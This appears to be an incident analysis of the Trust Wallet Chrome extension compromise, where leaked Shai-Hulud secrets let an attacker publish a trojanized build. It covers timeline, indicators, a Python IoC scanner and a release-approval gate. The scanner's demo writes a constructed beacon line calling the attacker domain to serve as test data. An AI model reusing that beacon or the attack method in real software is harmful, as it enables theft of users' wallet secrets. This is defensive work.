Full Report
Trust Wallet on Tuesday revealed that the second iteration of the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, ultimately resulting in the theft of approximately $8.5 million in assets. "Our Developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source
Analysis Summary
# Incident Report: Trust Wallet Chrome Extension Compromise via Supply Chain Attack
## Executive Summary
Trust Wallet suffered a significant security incident in which an attacker used developer GitHub secrets exposed during the second iteration of the Shai-Hulud supply chain attack to compromise its Google Chrome extension. Those secrets gave the attacker access to the extension's source code and to the Chrome Web Store (CWS) API key. The attacker then pushed a trojanized extension update to users, resulting in the theft of approximately \$8.5 million in cryptocurrency assets from over 2,500 addresses. Trust Wallet is now processing reimbursement claims and tightening its release process controls.
## Incident Details
- Discovery Date: Not stated precisely. Trust Wallet publicly disclosed the incident on Tuesday (December 30, 2025, inferred from the December 31 article date), several days after the malicious update was pushed.
- Incident Date: Malicious update (v2.68) was pushed on December 24, 2025.
- Affected Organization: Trust Wallet
- Sector: Software/Cryptocurrency Wallet Services
- Geography: Undisclosed (Global user base affected)
## Timeline of Events
### Initial Access
- Date/Time: November 2025 (second Shai-Hulud wave) or later; in any case before December 24, 2025.
- Vector: Software supply chain compromise (Shai-Hulud, second iteration) leading to credential exposure.
- Details: Trust Wallet's developer GitHub secrets were exposed in the attack. Shai-Hulud is a self-propagating npm worm that harvests developer credentials (GitHub and npm tokens, cloud keys) from infected developer machines and CI runners; the page does not say which Trust Wallet system was infected.
### Lateral Movement
- Date/Time: Following initial access.
- Vector: Use of the leaked GitHub secrets.
- Details: With those secrets the attacker reached the browser extension's source code and the Chrome Web Store (CWS) API key, which amounts to publisher-level control over the extension's distribution channel.
### Data Exfiltration/Impact
- Date/Time: Beginning December 24, 2025 (or shortly after).
- Vector: Distribution of malicious extension update (v2.68).
- Details: The attacker used the CWS API key to push a trojanized build (v2.68) directly to users. The campaign used the attacker-registered domain "metrics-trustwallet[.]com", with malicious builds served from "api.metrics-trustwallet[.]com". The backdoor harvested users' wallet mnemonic (seed) phrases, and approximately \$8.5 million in assets were drained from 2,520 wallets.
### Detection & Response
- Date/Time: December 24, 2025 (malicious update pushed); Trust Wallet urged users to update in the days that followed.
- Vector: Reports of drained wallets and internal investigation (the page does not say which came first).
- Details: Trust Wallet identified the issue, urged approximately 1 million users to update to version 2.69, and opened a reimbursement claim process for victims.
## Attack Methodology
- Initial Access: Compromise of developer infrastructure through the Shai-Hulud software supply chain attack, leading to the exposure of GitHub secrets.
- Persistence: Not detailed. On user machines the trojanized build itself persisted until replaced by v2.69; on the distribution side the stolen CWS API key remained usable until rotated. The page mentions only one malicious release (v2.68).
- Privilege Escalation: Possession of the CWS API key gave the attacker publisher-level control over the extension's deployment channel.
- Defense Evasion: Ability to upload malicious builds directly via the API key bypassed Trust Wallet's standard release process (internal approval/manual review).
- Credential Access: Implied successful theft of development credentials (GitHub secrets) via the Shai-Hulud infection vector.
- Discovery: Not detailed, but likely reconnaissance of the compromised developer environment to locate API keys and source code.
- Lateral Movement: Movement from compromised developer machine/secrets to Trust Wallet's CI/CD or distribution controls (CWS).
- Collection: A backdoor in the trojanized extension harvested users' wallet mnemonic phrases.
- Exfiltration: The harvested phrases left victims' browsers for attacker-controlled infrastructure; the attacker domains listed under Indicators of Compromise are the likely path, though the page does not confirm it.
- Impact: Direct financial theft: the stolen phrases were used to drain assets from 2,520 wallets to attacker-controlled addresses.
## Impact Assessment
- Financial: Approximately **\$8.5 million** stolen across 2,520 victims. Trust Wallet is processing reimbursements.
- Data Breach: Wallet mnemonic phrases (highly sensitive cryptographic recovery information) were exfiltrated from users.
- Operational: Forced emergency update rollout (v2.68 to v2.69) and temporary loss of integrity over the browser extension distribution pipeline.
- Reputational: Significant. A high-profile theft from a wallet product, with the extension's own update channel used to deliver the payload.
## Indicators of Compromise
- Network Indicators (Defanged): `metrics-trustwallet[.]com`, `api.metrics-trustwallet[.]com` (likely used for C2 or payload delivery).
- File Indicators: The trojanized extension build (v2.68). Beyond its ability to harvest mnemonic phrases, the page does not describe the backdoor mechanism, so no file hashes or code-level signatures are available here.
- Behavioral Indicators: Unauthorized uploads to the Chrome Web Store bypassing standard release procedures; unexpected asset transfers from user wallets following extension update.
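A host-side hunt for the indicators above, added here as an example (not tooling from Trust Wallet or the article): it walks a Chromium-style Extensions directory, flags any Trust Wallet manifest at version 2.68, and flags any text file that references the two attacker domains. The directory layout, the manifest name match and the constructed sample tree it builds when run without arguments are assumptions of the example.

```python
"""
Hunt for the trojanized Trust Wallet build across a Chromium-style Extensions
directory (Chrome, Brave and Edge profiles all use <profile>/Extensions/<id>/<version>_<n>/).

Two checks per installed extension:
  1. manifest "name" matches the wallet and "version" is a flagged release (2.68);
  2. any text file references an attacker domain from the IoC list.

Added example for this write-up, not Trust Wallet's or Google's tooling.
Assumption: the manifest "name" is a literal string. Chrome also allows a
localised "__MSG_...__" placeholder, in which case a production scanner should
key on the extension ID (the directory name) instead.
"""
import json
import re
import sys
import tempfile
from pathlib import Path

# Kept defanged in reports; refanged only in memory for matching.
IOC_DOMAINS_DEFANGED = ("metrics-trustwallet[.]com", "api.metrics-trustwallet[.]com")
FLAGGED_NAME_SUBSTRING = "trust wallet"      # matched case-insensitively against manifest "name"
FLAGGED_VERSIONS = frozenset({"2.68"})
TEXT_SUFFIXES = frozenset({".js", ".json", ".html", ".css", ".txt"})


def refang(domain: str) -> str:
    return domain.replace("[.]", ".")


_IOC_PATTERNS = [(d, re.compile(re.escape(refang(d)), re.IGNORECASE)) for d in IOC_DOMAINS_DEFANGED]


def scan_extension_dir(root) -> list:
    """Return a list of finding dicts; an empty list means nothing matched."""
    root = Path(root)
    findings = []
    scanned = set()   # avoid re-reading files if a manifest.json sits in a subdirectory
    for manifest_path in sorted(root.rglob("manifest.json")):
        ext_dir = manifest_path.parent
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8-sig", errors="replace"))
        except json.JSONDecodeError:
            continue
        name = str(manifest.get("name", ""))
        version = str(manifest.get("version", ""))
        if FLAGGED_NAME_SUBSTRING in name.lower() and version in FLAGGED_VERSIONS:
            findings.append({"type": "flagged_version", "path": str(ext_dir),
                             "name": name, "version": version})
        for f in sorted(p for p in ext_dir.rglob("*")
                        if p.is_file() and p.suffix.lower() in TEXT_SUFFIXES):
            if f in scanned:
                continue
            scanned.add(f)
            text = f.read_text(encoding="utf-8", errors="replace")
            hits = [d for d, pat in _IOC_PATTERNS if pat.search(text)]
            if hits:
                findings.append({"type": "ioc_domain", "path": str(f), "indicators": hits})
    return findings


def build_constructed_sample(root) -> Path:
    """Write a constructed two-extension tree: one clean 2.69 build, one trojanized 2.68 build."""
    root = Path(root)
    clean = root / "Extensions" / "cleanid0000" / "2.69_0"
    bad = root / "Extensions" / "badid00000" / "2.68_0"
    for d in (clean, bad):
        d.mkdir(parents=True, exist_ok=True)
    (clean / "manifest.json").write_text(json.dumps({"name": "Trust Wallet", "version": "2.69"}))
    (clean / "background.js").write_text("console.log('clean build');\n")
    (bad / "manifest.json").write_text(json.dumps({"name": "Trust Wallet", "version": "2.68"}))
    # Constructed beacon to the attacker-registered host from the IoC list.
    beacon = "fetch('https://" + refang("api.metrics-trustwallet[.]com") + "/collect');\n"
    (bad / "background.js").write_text(beacon)
    return root


def demo() -> list:
    """Scan the constructed sample tree in a fresh temp directory."""
    return scan_extension_dir(build_constructed_sample(tempfile.mkdtemp()))


if __name__ == "__main__":
    results = scan_extension_dir(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for finding in results:
        print(json.dumps(finding))
```

Run it against a real profile with `python scan.py "$HOME/.config/google-chrome/Default"` (path is an example; adjust per OS and browser). A hit on the domains inside any other extension is worth triage too, since the indicators are not tied to the Trust Wallet manifest.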
## Response Actions
- Containment: Urged approximately 1 million users to immediately update the Chrome extension to version 2.69.
- Eradication: Rotation of the exposed GitHub secrets and the CWS API key. This is not stated explicitly on the page; it is inferred from the attacker losing the ability to push further updates after v2.69 shipped.
- Recovery: Initiated a case-by-case reimbursement claim process for impacted victims. Enhanced monitoring and controls around the release process.
## Lessons Learned
- Developer secrets security is paramount: Leakage of secrets via supply chain attacks (like Shai-Hulud) provides direct, high-trust access to production distribution channels.
- Reliance on a single long-lived API key: the CWS API key alone was sufficient to publish, so internal approval gates were not circumvented but skipped entirely.
- Supply Chain Risk: Industry-wide software supply chain attacks (like Shai-Hulud) represent a significant indirect threat vector requiring security measures beyond typical application defenses.
## Recommendations
- Implement stringent secret management policies, including short-lived, scope-limited credentials and role-based access for anything that can publish to production (the CWS API key, in this case).
- Enhance source control security via stronger MFA, dedicated hardware security keys, and continuous monitoring for unusual access patterns (especially concerning developer machines known to be targeted by developer-focused malware like Shai-Hulud).
- Introduce multi-party authorization requirements or tamper-proof signing mechanisms for all production software builds, ensuring no single leaked key can grant unauthorized deployment capability.
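A minimal form of the last recommendation, added here as an example and not Trust Wallet's release tooling: the publish step refuses to proceed unless at least two distinct, registered approvers have authorised the exact artifact bytes (SHA-256) at the exact version. It uses HMAC tags under per-approver keys as a stand-in for real signatures (an assumption; a production pipeline would use Ed25519 or Sigstore signatures, with the same binding of digest, version and approver identity). The approver names, keys and artifact bytes are constructed.

```python
"""
Two-person release gate for an extension build.

publish_allowed() returns True only when >= THRESHOLD distinct approvers, each
known to the registry, have approved this exact artifact (by SHA-256) at this
exact version. A stolen publisher credential contributes zero approvals.

Added illustration for this write-up, not Trust Wallet's release tooling.
Assumption: approvals are HMAC-SHA256 tags under per-approver keys held in a
secrets manager; real deployments would use asymmetric signatures instead.
"""
import hashlib
import hmac
import json

THRESHOLD = 2   # assumption: two distinct approvers required per release

# Constructed registry and artifact; in practice keys come from a secrets manager
# and the artifact is the packed extension zip.
APPROVER_KEYS = {"alice": b"constructed-key-alice", "bob": b"constructed-key-bob"}
SAMPLE_ARTIFACT = b"PK\x03\x04constructed-extension-zip-bytes"


def artifact_digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _approval_message(approver: str, version: str, digest: str) -> bytes:
    # Canonical encoding: a tag over one (approver, version, digest) triple
    # cannot be replayed for a different build or a different version.
    fields = {"approver": approver, "version": version, "digest": digest}
    return json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()


def approve(approver: str, key: bytes, version: str, data: bytes) -> dict:
    """Produce one approver's authorisation for these exact bytes at this version."""
    digest = artifact_digest(data)
    tag = hmac.new(key, _approval_message(approver, version, digest), hashlib.sha256).hexdigest()
    return {"approver": approver, "version": version, "digest": digest, "tag": tag}


def verify_release(data: bytes, version: str, approvals: list, approver_keys: dict,
                   threshold: int = THRESHOLD) -> tuple:
    """Return (ok, reason). Counts only valid approvals from distinct registered approvers."""
    digest = artifact_digest(data)
    valid = set()
    for a in approvals:
        who = a.get("approver")
        key = approver_keys.get(who)
        if key is None:
            continue                                   # not a registered approver
        if a.get("version") != version or a.get("digest") != digest:
            continue                                   # approval is for other bytes or another version
        expected = hmac.new(key, _approval_message(who, version, digest), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, str(a.get("tag", ""))):
            continue                                   # forged or corrupted tag
        valid.add(who)                                 # a set, so duplicates count once
    if len(valid) < threshold:
        return False, f"{len(valid)} valid distinct approval(s), need {threshold}"
    return True, f"approved by {sorted(valid)}"


def publish_allowed(data: bytes, version: str, approvals: list, approver_keys: dict) -> bool:
    """The only code path that should ever be able to reach the Web Store upload call."""
    ok, _reason = verify_release(data, version, approvals, approver_keys)
    return ok


if __name__ == "__main__":
    approvals = [approve("alice", APPROVER_KEYS["alice"], "2.69", SAMPLE_ARTIFACT),
                 approve("bob", APPROVER_KEYS["bob"], "2.69", SAMPLE_ARTIFACT)]
    print(verify_release(SAMPLE_ARTIFACT, "2.69", approvals, APPROVER_KEYS))
    # Someone holding only the publisher credential has no approvals to present:
    print(verify_release(SAMPLE_ARTIFACT, "2.69", [], APPROVER_KEYS))
```

The gate only helps if the CWS credential is reachable solely through it: an attacker who exfiltrates the raw key, as happened here, can call the Web Store API from anywhere. Pair the gate with a short-lived, scope-limited publisher credential that is injected into this one pipeline job alone, and alert on any Web Store upload that did not originate from that job.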